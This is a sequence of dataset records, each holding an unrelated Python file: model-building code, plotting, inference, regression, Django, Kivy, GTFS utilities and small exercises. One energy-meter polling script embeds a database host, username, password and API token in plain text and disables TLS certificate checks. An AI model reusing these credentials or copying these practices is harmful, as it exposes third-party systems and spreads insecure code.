out_channels, stride))\n self.in_channels = out_channels * 4\n\n return nn.Sequential(*layers)\n\n def _make_last_layer(self, block, out_channels, num_blocks, stride):\n\n W = H = 32\n dim_in = 1024\n dim_out = 2048\n\n stage5 = []\n for i in range(3):\n stage5.append(\n BotBlock(in_dimension=dim_in, curr_h=H, curr_w=W, stride=2 if i == 0 else 1, target_dimension=dim_out)\n )\n if i == 0:\n H = H // 2\n W = W // 2\n dim_in = dim_out\n\n return nn.Sequential(*stage5)\n\n def _make_gt_layer(self, ch_in, ch_out):\n\n W = H = 8\n dim_in = ch_in\n dim_out = ch_out\n\n stage = []\n for i in range(3):\n stage.append(\n GTBotBlock(in_dimension=dim_in, curr_h=H, curr_w=W, stride=2 if i == 0 else 1, target_dimension=dim_out)\n )\n dim_in = dim_out\n\n return nn.Sequential(*stage)\n\n def _make_gt_layer2(self, ch_in, ch_out):\n\n W = H = 8\n dim_in = ch_in\n dim_out = ch_out\n\n stage = []\n stage.append(\n GTBotBlock(in_dimension=dim_in, curr_h=4, curr_w=4, stride=2 if 0 == 0 else 1, target_dimension=dim_out)\n )\n dim_in = dim_out\n\n stage.append(\n GTBotBlock2(in_dimension=dim_in, curr_h=H, curr_w=W, stride=2 if 1 == 0 else 1, target_dimension=dim_out)\n )\n dim_in = dim_out\n\n stage.append(\n BotBlock(in_dimension=dim_in, curr_h=16, curr_w=16, stride=2 if 2 == 0 else 1, target_dimension=dim_out)\n )\n\n return nn.Sequential(*stage)\n\n\n\n\ndef AGGT50():\n\n return AGGT(AGGTNeckC, [3, 4, 6, 3])\n\n\n\n\n\n","sub_path":"models/AGMB-Transformer.py","file_name":"AGMB-Transformer.py","file_ext":"py","file_size_in_byte":20103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"628324497","text":"import cv2\nimport csv\nimport random\nimport os\n\nnew = \"./kind/\"\ncate = \"./kind/\"\n\ndef plot_one_box(x, img, color=None, label=None, line_thickness=None,rank=0): # Plots one bounding box on image img\n tl = 2#line_thickness or round(0.002 * max(img.shape[0:2])) + 1 # line thickness\n color = color or [random.randint(0, 255) for _ in range(3)]\n c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))\n cv2.rectangle(img, c1, c2, color, tl)\n if label:\n tf = max(tl - 1, 1) # font thickness\n t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]\n c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3\n cv2.rectangle(img, c1, c2, color, -1) # filled\n cv2.putText(img, label+\":\"+str(rank), (c1[0], c1[1] - 2), 0, tl / 4, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)\n\nfilename = \"./submit.csv\"\nf = open(filename)\nreader = csv.reader(f)\nreader = list(reader)[1:]\nprint(list(reader))\n\nprint('-----processing-------')\n\nfor name,x1,y1,x2,y2,x3,y3,rec in reader:\n\n if rec == \"1\":\n label = \"havestar\"\n else:\n label = \"nostar\"\n print(\"input :\",new+label+\"/\"+name+\".jpg\")\n img = cv2.imread(new+label+\"/\"+name+\".jpg\")\n if img is None:\n print(\"shape:\")\n continue\n x1,x2,x3 = int(float(x1)),int(float(x2)),int(float(x3))\n y1,y2,y3 = int(float(y1)),int(float(y2)),int(float(y3))\n a = [x1-10,y1-10,x1+10,y1+10]\n b = [x2-10,y2-10,x2+10,y2+10]\n c = [x3-10,y3-10,x3+10,y3+10]\n print(a,b,c)\n plot_one_box(a,img,color = (250,0,0),label=label,rank=1)\n plot_one_box(b,img,color = (255,0,0),label=label,rank=2)\n plot_one_box(c,img,color = (255,0,0),label=label,rank=3)\n print(\"output:\",cate+label+\"1/\"+name+\".jpg\")\n 
print(cv2.imwrite(cate+label+\"1/\"+name+\".jpg\",img))\n\n","sub_path":"vis_submit/plotsubmit.py","file_name":"plotsubmit.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"193886981","text":"#!/usr/bin/env python3\n\nimport aiohttp\nimport asyncio\nimport click\nimport json\nimport math\nimport os\nfrom tqdm.asyncio import tqdm as async_tqdm\nfrom tqdm import tqdm\n\nfrom palette_adapter import PaletteAdapter\n\nADAPTERS = {\n \"palette\": PaletteAdapter\n}\n\n# Batching required otherwise asyncio times out\nBATCH_SIZE = 1000\nMAX_CONNECTIONS = 32\n\n\n@click.command()\n@click.option(\"-h\", \"--inferrer-host\", type=str, required=True)\n@click.option(\"-a\", \"--adapter-name\", type=click.Choice(list(ADAPTERS.keys())), required=True)\n@click.option(\"-i\", \"--input-dir\", type=str, required=True)\n@click.option(\"-o\", \"--output-file\", type=str, required=True)\n@click.option(\"-n\", type=int, default=0)\ndef run_inference(inferrer_host, adapter_name, input_dir, output_file, n):\n adapter = ADAPTERS[adapter_name](inferrer_host)\n image_urls = [f\"file://{os.path.abspath(file.path)}\" for file in os.scandir(input_dir)]\n if n != 0:\n image_urls = image_urls[0:n]\n results = []\n\n async def run():\n connector = aiohttp.TCPConnector(limit=MAX_CONNECTIONS)\n session = aiohttp.ClientSession(connector=connector)\n\n for batch in tqdm(range(math.ceil(len(image_urls) / BATCH_SIZE))):\n url_batch = image_urls[(batch * BATCH_SIZE):((batch + 1) * BATCH_SIZE)]\n responses = [adapter.make_request(session, image_url) for image_url in url_batch]\n for coroutine in async_tqdm.as_completed(responses):\n result = await coroutine\n results.append(result)\n\n await session.close()\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(run())\n\n with open(output_file, \"w\") as f:\n json.dump({\"results\": results}, f)\n\n\nif __name__ == \"__main__\":\n run_inference()\n","sub_path":"api_interfaces/local_inference/run_inference.py","file_name":"run_inference.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"81416590","text":"from sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import GridSearchCV\nimport numpy as np\n\ndef train_model(model, parameter, X, y):\n grid_model = GridSearchCV(estimator=model,param_grid=parameter,scoring=\"r2\",cv=5)\n grid_model.fit(X,y)\n return grid_model.best_score_, grid_model.best_estimator_\n\n# Linear regression:\ndef linearRegression(X_train, X_dev, y_train, y_dev):\n from sklearn import linear_model\n print(\"Begin linear regression training...\")\n model_LinearRegression = linear_model.LinearRegression()\n model_LinearRegression.fit(X_train, y_train)\n y_pred = model_LinearRegression.predict(X_dev)\n RMSE = np.sqrt(mean_squared_error(y_pred, y_dev))\n\n print ('LogicalClassifier RMSE:', RMSE)\n\n return model_LinearRegression\n\n# Ridge regression:\ndef RidgeRegression(X, y):\n from sklearn import linear_model\n print(\"Begin Ridge regression training...\")\n alpha = np.logspace(-6,-1,10)\n parameter = dict(alpha=alpha)\n model = linear_model.Ridge() \n return train_model(model,parameter,X,y)\n\n# Lasso regression:\ndef LassoRegression(X, y):\n from sklearn import linear_model\n print(\"Begin Lasso regression training...\")\n alpha = np.logspace(-6,-1,10)#(?)\n parameter = dict(alpha=alpha)\n model = linear_model.Lasso()\n return 
train_model(model,parameter,X,y)\n\n# ElasticNet regression:\ndef ElasticNetRegression(X, y):\n    from sklearn import linear_model\n    print(\"Begin ElasticNet regression training...\")\n    alpha = np.logspace(-6,-1,10)#(?)\n    parameter = dict(alpha=alpha, l1_ratio=[0.5])  # GridSearchCV's param_grid needs a list of candidate values, not a bare scalar\n    model = linear_model.ElasticNet()\n    return train_model(model,parameter,X,y)\n\n# ExtraTree regression:\ndef ExtraTreeRegression(X, y):\n    from sklearn.ensemble import BaggingRegressor\n    from sklearn.tree import ExtraTreeRegressor\n    print(\"Begin ExtraTree regression training...\")\n    n_estimators = np.array([i for i in range(5,15)])\n    parameter = dict(n_estimators=n_estimators)\n    extra_tree = ExtraTreeRegressor(random_state=0)\n    model = BaggingRegressor(extra_tree, random_state=0)\n\n    return train_model(model,parameter,X,y)\n\n# Decision Tree regression:\ndef DecisionTreeregression(X, y):\n    from sklearn import tree\n    print(\"Begin Decision Tree regression training...\")\n    max_depth = np.logspace(0,1,10).astype(int)  # max_depth must be an integer; logspace yields floats\n    parameter = dict(max_depth=max_depth)\n    model = tree.DecisionTreeRegressor()\n\n    return train_model(model,parameter,X,y)\n\n# Random Forest regression:\ndef RandomForestregression():\n    print(\"Begin Random Forest regression training...\")\n    return 0\n\n# Gradient Boosting Random Forest Regression\ndef GradientBoostingRandomForestRegression():\n    print(\"Begin Gradient Boosting Random Forest regression training...\")\n    return 0\n","sub_path":"reg_alg.py","file_name":"reg_alg.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"376096203","text":"import csv\nimport re\n\ndef opener():\n    f = open('zamok.txt','r', encoding = 'utf-8')\n    text = f.read()\n    f.close()\n    return text\n\ndef name_search(x):\n    print ('1. Найти и распечатать на экране все упоминания имен вида \"инициал + фамилия\" (например: Я. Меттенлейтер). \\n')\n    list1 = []\n    regex = re.findall('[^А-ЯЁ]([А-ЯЁ]\\. ?[А-ЯЁ][а-яё]+)', x)\n    if regex:\n        for one in regex:\n            list1.append(one)\n    for element in list1:\n        print (element)\n    print ('\\n')\n\ndef name_search2(y):\n    print ('2. Найти в статье вообще все имена (инициалы + фамилия, например, В. И. Наливайко; имя + фамилия, например, Винченцо Бренна). При этом в найденное может попасть лишнее (например, Круглому Тронному), но не должно ничего теряться. \\n')\n    list2 = []\n    regex2 = re.findall('((?:[А-Я]\\. 
)+[А-ЯЁ][а-яё]+)', y)\n if regex2:\n for one in regex2:\n list2.append(one)\n for element in list2:\n print (element)\n \n regex3 = re.findall ('[А-Я][а-я]+ [А-Я][а-я]+',y)\n if regex3:\n for one in regex3:\n list2.append(one)\n for element in list2:\n print (element)\n return list2\n \ndef main(): \n name_search(opener())\n name_search2(opener())\n \n\nif __name__ == \"__main__\":\n main()\n\n#os.makedirs(papka)\n","sub_path":"Koshevoy_exam.py","file_name":"Koshevoy_exam.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"101085181","text":"# -*- coding: utf-8 -*-\n\ndef is_vowel(phoneme):\n return phoneme in IPA['vowels'].keys()\n\ndef ipa(word):\n return ''.join([_ipa_symbols(phoneme) for phoneme in word])\n\ndef _ipa_symbols(phoneme):\n return IPA['vowels'].get(phoneme) or IPA['consonants'].get(phoneme)\n\ndef destress(word):\n for character in \"012\":\n if character in word:\n word = word.replace(character, '')\n return word\n\ndef parse_syllables(phonemes):\n syllables = []\n syllable = []\n for phoneme in phonemes:\n syllable.append(phoneme)\n if is_vowel(phoneme) or phoneme == 'END_WORD' or phoneme == 'START_WORD':\n syllables.append(tuple(syllable))\n syllable = []\n\n return tuple(syllables)\n\ndef stress_level(syllable):\n vowel = syllable[-1]\n if '0' in vowel:\n return 'tertiary'\n elif '2' in vowel:\n return 'secondary'\n elif '1' in vowel:\n return 'primary'\n elif vowel == 'END_WORD':\n return 'end_word'\n elif vowel == 'START_WORD':\n return 'start_word'\n\ndef stress_symbol(level):\n return 'ˈ' if level == 'primary' else 'ˌ'\n\ndef clean_end_word_pseudovowel(unit, ignore_syllables):\n if ignore_syllables:\n return None if unit == 'END_WORD' else unit\n\n if unit[-1] == 'END_WORD':\n if len(unit) > 1:\n return unit[:-1]\n else:\n return None\n else:\n return unit\n\nIPA = {\n 'vowels': {\n 'AA': 'ɑ', 'AA1': 'ɑː', 'AA2': 'ɑ', 'AA0': 'ə',\n 'AE': 'æ', 'AE1': 'æ', 'AE2': 'æ', 'AE0': 'ə',\n 'AH': 'ʌ', 'AH1': 'ʌ', 'AH2': 'ʌ', 'AH0': 'ə',\n 'AO': 'ɔ', 'AO1': 'ɔː', 'AO2': 'ɔ', 'AO0': 'ə',\n 'AW': 'aʊ', 'AW1': 'aʊ', 'AW2': 'aʊ', 'AW0': 'ə',\n 'AY': 'aɪ', 'AY1': 'aɪ', 'AY2': 'aɪ', 'AY0': 'ɨ',\n 'EH': 'ɛ', 'EH1': 'ɛ', 'EH2': 'ɛ', 'EH0': 'ɨ',\n 'ER': 'ɚ', 'ER1': 'ɜːr', 'ER2': 'ɚ', 'ER0': 'ɚ',\n 'EY': 'eɪ', 'EY1': 'eɪ', 'EY2': 'eɪ', 'EY0': 'ɨ',\n 'IH': 'ɪ', 'IH1': 'ɪ', 'IH2': 'ɪ', 'IH0': 'ɨ',\n 'IY': 'i', 'IY1': 'iː', 'IY2': 'i', 'IY0': 'ɨ',\n 'OW': 'o', 'OW1': 'oʊ', 'OW2': 'o', 'OW0': 'ə',\n 'OY': 'ɔɪ', 'OY1': 'ɔɪ', 'OY2': 'ɔɪ', 'OY0': 'ɔɪ',\n 'UH': 'ʊ', 'UH1': 'ʊ', 'UH2': 'ʊ', 'UH0': 'ᵿ',\n 'UW': 'uː', 'UW1': 'uː', 'UW2': 'uː', 'UW0': 'u'\n },\n 'consonants': {\n 'B': 'b',\n 'CH': 't͡ʃ',\n 'D': 'd',\n 'DH': 'ð',\n 'F': 'f',\n 'G': 'g',\n 'HH': 'h',\n 'JH': 'd͡ʒ',\n 'K': 'k',\n 'L': 'l',\n 'M': 'm',\n 'N': 'n',\n 'NG': 'ŋ',\n 'P': 'p',\n 'R': 'r',\n 'S': 's',\n 'SH': 'ʃ',\n 'T': 't',\n 'TH': 'θ',\n 'V': 'v',\n 'W': 'w',\n 'Y': 'j',\n 'Z': 'z',\n 'ZH': 'ʒ'\n }\n}\n","sub_path":"lib/ipa.py","file_name":"ipa.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"24187567","text":"import os\nimport subprocess\nimport time\n\n\nSTARTUP_TIME = 3.0\n\n\nclass Launcher(object):\n \"\"\"\n execute mpirun cmd\n close process for mpirun\n \"\"\"\n def __init__(self, ports):\n self.port_list = ports\n self.mpirun_proc = None\n\n def launch(self):\n hetr_server_path = 
os.path.dirname(os.path.realpath(__file__)) + \"/hetr_server.py\"\n hetr_server_num = os.getenv('HETR_SERVER_NUM')\n hetr_server_gpu_num = os.getenv('HETR_SERVER_GPU_NUM')\n hetr_server_hostfile = os.getenv('HETR_SERVER_HOSTFILE')\n\n if (hetr_server_num is not None) & (hetr_server_hostfile is not None):\n # Assumption is that hydra_persist processes are started on remote nodes\n # Otherwise, remove \"-bootstrap persist\" from the command line (it then uses ssh)\n mpirun_str = \"mpirun -n %s -ppn 1 -bootstrap persist -hostfile %s %s\"\\\n % (hetr_server_num, hetr_server_hostfile, hetr_server_path)\n subprocess.call(mpirun_str, shell=True)\n elif (hetr_server_gpu_num is not None):\n cmd = ['mpirun',\n '--allow-run-as-root',\n '-n', hetr_server_gpu_num,\n 'python', hetr_server_path,\n '-p'] + self.port_list\n try:\n self.mpirun_proc = subprocess.Popen(cmd)\n time.sleep(STARTUP_TIME)\n except:\n raise RuntimeError(\"Process launch failed!\")\n\n def close(self):\n if self.mpirun_proc:\n self.mpirun_proc.terminate()\n time.sleep(STARTUP_TIME)\n if self.mpirun_proc:\n self.mpirun_proc.kill()\n self.mpirun_proc.wait()\n","sub_path":"ngraph/transformers/hetr/mpilauncher.py","file_name":"mpilauncher.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"496727666","text":"from kivy.lang import Builder\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.properties import DictProperty, NumericProperty, StringProperty, \\\n BooleanProperty, ObjectProperty\nfrom operator import itemgetter\nfrom kivy.uix.button import Button\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.label import Label\n\nBuilder.load_string(\"\"\"\n:\n bold: True\n on_press: self.data_table.sort_by(self.text)\n:\n background_down: self.background_normal\n:\n multiline: False\n on_focus: if not self.focus: self.data_table.data_update(self.id, self.text)\n:\n halign: 'left'\n:\n id: table_grid\n cols: self.ncol\n\"\"\")\n\nclass ColHeader(Button):\n #For some reason, adding this property as part of a\n #dynamic class declaration was failing.\n data_table = ObjectProperty(None)\n\nclass RowHeader(Button):\n data_table = ObjectProperty(None)\n initial_type = ObjectProperty(None)\n\nclass EditableCell(TextInput):\n data_table = ObjectProperty(None)\n initial_type = ObjectProperty(None)\n\nclass StaticCell(Label):\n data_table = ObjectProperty(None)\n initial_type = ObjectProperty(None)\n\n\nclass DataTable(GridLayout):\n \"\"\"This is a compound widget designed to display\n a dictionary of data as a nice table. The dictionary\n should have the column headers as keys, and then\n the associated value is a list of data for that\n column.\n\n You may have lists of different lengths, but the columns\n will fill from the top down; therefore, include blank\n strings as placeholders for any empty cells.\n\n Note that since the column headers are dict keys, you\n must have unique column names. 
Sorry...\"\"\"\n data = DictProperty({})\n ncol = NumericProperty(0)\n nrow = NumericProperty(0)\n editable = BooleanProperty(False)\n header_col = StringProperty('')\n\n def __init__(self, data = {}, editable = False, header_column = '',\n header_row = [], **kw):\n super(DataTable, self).__init__(**kw)\n self.data = data\n self.ncol = len(data)\n self.editable = editable\n self.header_col = header_column\n self.header_row = header_row\n celltype = EditableCell if self.editable else StaticCell\n self.nrow = max([len(data[x]) for x in data])\n self.cells = {}\n for key in self.header_row:\n cell_id = str(key)+'_head'\n cell = ColHeader(text = str(key), data_table = self, id = cell_id)\n self.cells[cell_id] = cell\n self.add_widget(cell)\n for i in range(self.nrow):\n get = itemgetter(i)\n for key in self.header_row:\n cell_id = str(key)+'_'+str(i)\n if i <= len(self.data[key]):\n text = get(self.data[key])\n else:\n text = ''\n self.data[key].append('')\n if key == self.header_col:\n self.cells[cell_id] = RowHeader(text = str(text), data_table = self,\n id = cell_id, initial_type = type(text))\n else:\n self.cells[cell_id] = celltype(text = str(text), data_table = self,\n id = cell_id, initial_type = type(text))\n self.add_widget(self.cells[cell_id])\n\n def data_update(self, cell_id, value):\n \"\"\"This will try to convert the value\n to the initial type of the data. If that fails,\n it'll just be a string. The initial type won't\n change, however.\"\"\"\n key, idx = cell_id.split('_')\n try:\n val = self.cells[cell_id].initial_type(value)\n except ValueError:\n val = value\n self.data[key][int(idx)] = val\n\n def sort_by(self, colname):\n column_to_order = enumerate(self.data[colname])\n sort_order = map(itemgetter(0),\n sorted(column_to_order, key=itemgetter(1)))\n for key in self.data:\n col = self.data[key]\n self.data[key] = [col[x] for x in sort_order]\n self.cells[str(key)+'_head'].background_color = (1, 1, 1, 1)\n for i in range(self.nrow):\n self.cells[str(key)+'_'+str(i)].text = str(self.data[key][i])\n self.cells[colname+'_head'].background_color = (0, 1, 0, 1)\n\nif __name__ == '__main__':\n import random\n data = {'Col1':[random.random() for x in range(10)],\n 'Col2':[random.random() for x in range(10)],\n 'Col3':[random.random() for x in range(10)],\n 'Col4':[random.random() for x in range(10)],\n 'Col5':[random.random() for x in range(10)]}\n from kivy.base import runTouchApp\n from kivy.uix.pagelayout import PageLayout\n from kivy.factory import Factory\n Builder.load_string(\"\"\"\n:\n canvas.before:\n Color:\n rgba: 0, 0, 0, 1\n Rectangle:\n pos: self.pos\n size: self.size\n \"\"\")\n\n pg = PageLayout()\n staticpage = Factory.Page(name='static')\n staticpage.add_widget(DataTable(name = 'static', data=data, header_column = 'Col1',\n header_row = ['Col'+str(x+1) for x in range(5)]))\n editpage = Factory.Page(name='edit')\n editpage.add_widget(DataTable(name = 'edit', data=data, header_column = 'Col5',\n header_row = ['Col'+str(5-x) for x in range(5)],\n editable = True))\n pg.add_widget(staticpage)\n pg.add_widget(editpage)\n runTouchApp(pg)\n","sub_path":"deepdiy/test/draft/test_table.py","file_name":"test_table.py","file_ext":"py","file_size_in_byte":5645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"273513419","text":"\nclass Solution:\n def reverse(self, x: int) -> int:\n reverse = 0;\n val = abs(x)\n minus = 1\n if val != x:\n minus = -1\n val_s = str(val)\n i = len(val_s) - 1\n while i >= 0:\n reverse = 
reverse * 10 + int(val_s[i])\n i = i - 1\n if reverse >= pow(2,31):\n reverse = 0\n return reverse * minus\n\n\n\n\n\n\n\nx=120\nA=Solution()\nprint(A.reverse(x))","sub_path":"1-50/0007. Reverse Integer.py","file_name":"0007. Reverse Integer.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"144927399","text":"#!/usr/bin/env python\n#\nimport json\nimport arrow\nimport requests\nfrom time import sleep\n\nimport mysql.connector\nfrom datetime import time, date, timedelta, datetime\n\n#tocken = \"Mi45MTExOkVvbnN2ZXJpZ2Ux\"\n#plugid = \"101171\"\nimport os, time\nimport sys\n\ndef handelError ():\n\te = sys.exc_info()[0]\n\tpatch = \"/home/ec2-user/\"\n\tfilename = \"neurio-log.txt\"\n\tlogfile = open(patch+filename,'a+')\n\tprint (\"%s;%s\\n\" % (e,datetime.now()))\n\tlogfile.write (\"%s;%s\\n\" % (e,datetime.now()))\n\tlogfile.close ()\n\n\n\ndef set_TZ():\n\tos.environ['TZ'] = 'Europe/Berlin'\n\ttime.tzset()\n\t\n\ndef PlugWattNow (PlugID, Authorization):\n\tkoll_url_live = 'https://stagingapi.eon.se/eonapi/ODataProvider.svc/KwStreamLive?$filter=deviceId eq '\n\tnio_sens_id = PlugID\n\t\n\turl = koll_url_live + nio_sens_id\n\tres = requests.get(\n\t\t\turl\n\t\t\t,headers={\n\t\t\t'Authorization': Authorization,\n\t\t\t'Content-Type': 'application/json',\n\t\t\t'Accept': 'application/json'\n\t\t\t}\n\t\t\t,verify=False\n\t)\n\tjstr = json.dumps(res.json())\n\tjstr = json.loads(jstr)\n\t\n\tprint (jstr['d']['results'][0]['kw'])\n\treturn jstr['d']['results'][0]['kw']\n\t\n\t\ndef KollSendDataSQL (w,SensorID):\n\t\n\t# Open database connection\n\t#db = mysql.connector.connect(host='megatrenddb.ctcmpabozwdk.us-west-2.rds.amazonaws.com'\n\ttry:\n\t\tcnx = mysql.connector.connect(host='megatrenddb.ctcmpabozwdk.us-west-2.rds.amazonaws.com'\n\t\t\t\t\t\t\t,user='tryggel'\n\t\t\t\t\t\t\t,password='megatrend15'\n\t\t\t\t\t\t\t,database=''\n\t\t\t\t\t\t\t)\n\n\t\t# prepare a cursor object using cursor() method\n\t\tcursor = cnx.cursor()\n\t\t#DATETIME values in 'YYYY-MM-DD HH:MM:SS' format\n\n\t\tadd_reading = (\"INSERT INTO `mess_all`.`koll_all` \"\n\t\t\t\t \"(`w`, `SensorID`) \"\n\t\t\t\t \"VALUES (%s, %s)\")\n\t\t\t\t\t\n\t\tdata_readings = (w,SensorID)\n\t\tcursor.execute(add_reading, data_readings)\n\n\t\t# execute SQL query using execute() method.\n\t\t# Make sure data is committed to the database\n\t\tcnx.commit()\n\t\tcursor.close()\n\t\tcnx.close()\n\texcept mysql.connector.Error as err:\n\t\tprint(\"Something went wrong: {}\".format(err))\n\t\tpatch = \"/home/ec2-user/\"\n\t\tfilename = \"sqllogkoll.txt\"\n\t\tlogfile = open(patch+filename,'a+') \n\t\tlogfile.write ('%s;%s' % (err,datetime.now()))\n\ndef getingData():\n\ttocken = \"Mi45MTExOkVvbnN2ZXJpZ2Ux\"\n\tplugid = \"101171\"\n\tw = 0\n\ttimewait =0.0\n\twhile True:\n\t\ttime1 = datetime.now()\n\t\twait1 = time1\n\t\tw = PlugWattNow(plugid,tocken)\n\t\tprint (\"%ss\\tdone: requesting values.\" % ((datetime.now() -wait1).total_seconds()))\n\t\t#print (\"oDelta%s\"%oDelta)\n\t\twait1 = datetime.now()\n\t\tKollSendDataSQL(w,plugid)\n\t\tprint (\"%ss\\tdone: send to SQL.\" % ((datetime.now() -wait1).total_seconds()))\n\t\tprint ('W:%s;\\tT:%s;' %(\n\t\t\tw \t\n\t\t\t,datetime.now()\n\t\t\t)\n\t\t)\n\t\ttime2 = datetime.now()\n\t\ttimed = time2 - time1\n\t\ttimewait = 60 - timed.total_seconds()\n\t\ttimewait = max(timewait, 0)\n\t\twait1 = datetime.now()\n\t\tsleep(timewait)\n\t\tprint (\"%s\\tdone: waiting.\" % ((datetime.now() 
-wait1).total_seconds()))\n\ndef main():\n\ttry:\n\t\tset_TZ()\n\t\tgetingData()\n\texcept: \n\t\thandelError ()\n\t\tsleep(5)\n\t\tmain()\n\n\t\nmain()\n\n\n\n","sub_path":"Python 100Koll/100KollGet_Eye.py","file_name":"100KollGet_Eye.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"617533223","text":"import climate\nimport os\nimport pandas as pd\nimport requests\nimport zipfile\n\nlogging = climate.get_logger('gtfs')\n\nURL = 'https://data.texas.gov/download/r4v4-vz24/application/zip'\nLOCAL = '/tmp/capmetro-stops.zip'\n\ndef download():\n if not os.path.exists(LOCAL):\n logging.info('retrieving data from %s', URL)\n s = requests.get(URL).content\n with open(LOCAL, 'wb') as h:\n h.write(s)\n logging.info('saved %d bytes to %s', len(s), LOCAL)\n\n\ndef parse():\n frames = {}\n with zipfile.ZipFile(LOCAL) as z:\n for info in z.filelist:\n key = info.filename.split('.')[0]\n with z.open(info) as h:\n frames[key] = pd.read_csv(h)\n for pk in (key + '_id', '{}_id'.format(key[:-1])):\n if pk in frames[key]:\n logging.info('%s: setting key %s', key, pk)\n frames[key] = frames[key].set_index(pk)\n break\n logging.info('%s: loaded %s: %d rows',\n LOCAL, key, len(frames[key]))\n return frames\n\n\ndef main():\n download()\n d = parse()\n for k, df in d.items():\n print(k, df)\n\n\nif __name__ == '__main__':\n climate.call(main)\n","sub_path":"metadata/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"481471101","text":"\nfrom django.contrib import admin\nfrom django.urls import path, include \nfrom . import views\n\napp_name=\"app\"\nurlpatterns = [\n path('', views.main, name='main' ),\n path('ajax_api_projectmake', views.projectmake, name='projectmake'),\n path('ajax_api_projectselect', views.projectselect, name='projectselect'),\n path('ajax_api_projectreturn', views.projectreturn, name='projectreturn'),\n path('ajax_api_projectdelete', views.projectdelete, name='projectdelete'),\n path('ajax_api_appdetermine', views.appdetermine, name='appdetermine'),\n path('ajax_api_appestablish', views.app_establish, name='app_establish'),\n]\n","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"436502714","text":"from django.conf.urls.defaults import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\n#from django.contrib import admin\n#admin.autodiscover()\n\nurlpatterns = patterns('blogs.views',\n (r'^$', 'index'),\n (r'^(?P\\d+)/$', 'oneblog'),\n (r'^newblog/$', 'addblog'),\n (r'^(?P\\d+)/newentry/$', 'newentry'),\n (r'^(?P\\d+)/(?P\\d+)/$', 'oneentry'),\n (r'^(?P\\d+)/(?P\\d+)/editentry/$', 'editentry'),\n (r'^(?P\\d+)/(?P\\d+)/delete/$', 'deleteentry'),\n # Examples:\n # url(r'^$', 'mysite.views.home', name='home'),\n # url(r'^mysite/', include('mysite.foo.urls')),\n)\n\n#urlpatterns += patterns('',\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n# url(r'^admin/', 
include(admin.site.urls)),\n#)\n","sub_path":"blogs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"494710256","text":"from datetime import datetime\nimport pytz\nfrom unittest import TestCase\nfrom raceflow import RaceFlowConverter\n\n\nclass Test(TestCase):\n\n def setUp(self):\n self.converter = RaceFlowConverter(datetime(2021, 8, 7, 7, tzinfo=pytz.UTC))\n\n def test_update_race_flow_empty(self):\n test_input = {1: {}}\n expected_output = '[]'\n test_output = self.converter.convert_flow_data(test_input)\n self.assertEqual(expected_output, test_output)\n\n def test_update_race_flow_simple(self):\n test_input = {'2': {'Alice': {1628319600: 0, 1628319750: 0.5, 1628319900: 1}}}\n expected_output = '[{\"name\": \"Alice\", \"initials\": \"A\", \"color\": \"#1f77b4\", \"groups\": \"P\", \"data\": [{\"x\": 0.0, \"y\": 0.0}, {\"x\": 0.5, \"y\": 0.0}, {\"x\": 1.0, \"y\": 0.0}]}]'\n test_output = self.converter.convert_flow_data(test_input)\n self.assertEqual(expected_output, test_output)\n","sub_path":"test_raceflow.py","file_name":"test_raceflow.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"600449846","text":"# You’re an engineer at a disruptive drone delivery startup and your CTO asks you to come up with an efficient\n# algorithm that calculates the minimum amount of energy required for the company’s drone to complete its flight. You\n# know that the drone burns 1 kWh (kilowatt-hour is an energy unit) for every mile it ascends, and it gains 1 kWh for\n# every mile it descends. Flying sideways neither burns nor adds any energy.\n#\n# Given an array route of 3D points, implement a function calcDroneMinEnergy that computes and returns the minimal\n# amount of energy the drone would need to complete its route. Assume that the drone starts its flight at the first\n# point in route. That is, no energy was expended to place the drone at the starting point.\n#\n# For simplicity, every 3D point will be represented as an integer array whose length is 3. Also, the values at\n# indexes 0, 1, and 2 represent the x, y and z coordinates in a 3D point, respectively.\n#\n# Explain your solution and analyze its time and space complexities.\n#\n# Example:\n#\n# input: route = [ [0, 2, 10],\n# [3, 5, 0],\n# [9, 20, 6],\n# [10, 12, 